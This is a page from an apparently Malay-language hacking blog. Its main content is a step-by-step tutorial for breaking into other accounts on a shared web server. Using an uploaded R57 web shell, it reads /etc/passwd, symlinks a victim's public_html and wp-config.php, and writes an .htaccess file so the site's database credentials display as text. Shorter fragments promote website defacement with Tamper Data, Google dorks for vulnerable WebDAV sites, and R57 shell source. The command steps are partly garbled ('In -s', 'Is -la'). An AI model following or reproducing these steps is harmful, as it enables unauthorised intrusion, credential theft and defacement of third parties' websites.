ok korang boleh download software tu kat sini
DOWNLOAD
ok jom mula bukak sofware 2 dan akan kuar tampilan macam ini
Home » Archives for April 2013
Salam sejahtera semua
Hari ni ku ajar korang cara deface mengunakan tamper data .
Sebenarnya tamper data ini mudah dipelajari dan mudah di fahami . oleh kerana tutorial jenis bergambar kurang difahami jadi saya telah buat tutorial jenis video kepada semua pembaca pembaca blog saya .
salam
lama dah tak update blog . jadi sekarang saya akan ajar korang cara bypassing server mengunakan keadah symlink . ok . ikut tutorial dia ok . banyak step . ikut satu persatu .
ok .. pertama korang kena ada shell yang sudah diuploadkan kedalam satu pelayan . ok. jadi shell yang saya gunakan adalah R57 shell sebab senang untuk bypass dir dan senang untuk menjalankan command .
ini shell yang saya gunakan .
kedua:di dalam RUN command taipkan command yang berbunyi :
:cat /etc /passwd
macam dalam gambar dekat bawah ni .
ok . selepas itu akan keluar list yang banyak macam dalam gambar dekat bawah ni .
yang akan di listkan adalah seperti root / username / dir / dan banyak lagi . ok . yang seterusnya adalah make dir
cari dir ;images di dalam server itu lepas itu buat satu lagi folder dengan nama khan
open shell di tab yang baru selepas itu jalankan command yang berbunyi :
:mkdir khan
selepas itu masuk kedalam folder khan
ok.. cari username yang di listkan di dalam list command . cari domain slah satu dari pada domain yang ada tersenarai dalam server itu . guna ip server yang ada shell r57 untuk mencari website yang sama dalam local host .
yang number satu adalah ip website dan yang kedua adalah domain website yang ada tersenarai dalam shell r57
saya akan ambil website yang ada anak panah yang number 2 .
ok .
sekarang copy link website tersebut . redhotcellphone
dan ctrl+f di dalam shell dan paste .
ok .. sekarang run command yang berbunyi
:In -s/home/redhotce/public_html/ redhotcel
selepas itu . pergi ke shell itu balik . sekarang korang buka shell yang baru dengan open new tab . shell yang korang buka itu mesti directory yang mula mula sekali korang lakukan tadi .
selepas itu taip command yang berbunyi
:touch .htaccess
selepas itu tekan enter
di dalam kotak merah itu taip pula command yang berbunyi
:khan/.htaccess
selepas folder yang di buat tadi . folder tadi nama dia khan . jadi dekat hujung khan . di dalam kotak yang bertajuk 'file to edit'
:khan/.htaccess
selepas itu tekan Edit files. selepas itu akan keluar satu kotak . masukan word ini
'option indexes followsymlink
DirectoryIndex khan.htm
AddType txt .php
AddHandler txt .php'
buang simbol '
oke ,.
selepas itu tekan save .
selepas itu akan keluar macam biasa . ok ..
sekarang korang run lagi command yang berbunyi
:Is -la
dan enter .
copy domain tersebut dan paste dekat url bar . maka akan keluar directory macam ni
di dalam directory khan yang kita buat . ada satu file name yang bernama
:redhotcel
yahoo . korang dah jumpa public_html .. korang boleh download config file..
korang click folder yang bernama redhotcel tu . di dalam kotak macam gambar di atas
akan keluar directory untuk redhotcel
ok... sekarang balik kepada shell tadi
taip command yang berbunyi
:In -s/home/redhotcel/public_html/wp-config.php config.txt
macam gambar dekat bawah ni =-
korang boleh juga mengunakan command yang berbunyi
:In -s/home/redhotcel/public_html/wp-configuration.php configuration.txt
selepas itu tekan enter =-
selepas korang tekan enter . korang run lagi command yang berbunyi
:Is -la
maka akan keluar
selepas itu korang buka balik dir khan tadi . maka akan keluar config.txt
korang kilk config.txt tersebut dan boom.!
\
db username :alalala'
db password:lalala'
ok ..sekarang sudah selesai . sebenarnya symlink ada satu php untuk ambil e-mail dan tukar kepada email korang ..
ok. ini tutorial part 1 .. tunggu tutorial part dua
menuakar password mengunakan forget password enjoy ..
r57 shell source code here
p/s: endahkan simbol : dan '
Sekarang akan kita bahas tentang cara mencari web yang webdav vulnerability, caranya sangat mudah seperti biasa kita gunakan Google Dork untuk mencari web target. Ini dia Dork Webdav yang bisa kita coba:
Copyright (c) 2014 MxDotMy | Media Terkini. All Rights Reserved.
Template New Thesis SEO by CB Blogger. Powered by Blogger